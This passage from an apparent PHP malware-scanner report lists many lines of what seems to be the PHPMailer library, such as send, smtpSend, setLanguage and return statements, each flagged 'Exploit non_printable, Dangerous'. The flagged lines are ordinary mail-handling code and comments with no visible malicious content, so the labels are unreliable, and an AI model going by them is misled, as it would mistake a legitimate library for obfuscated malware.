</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
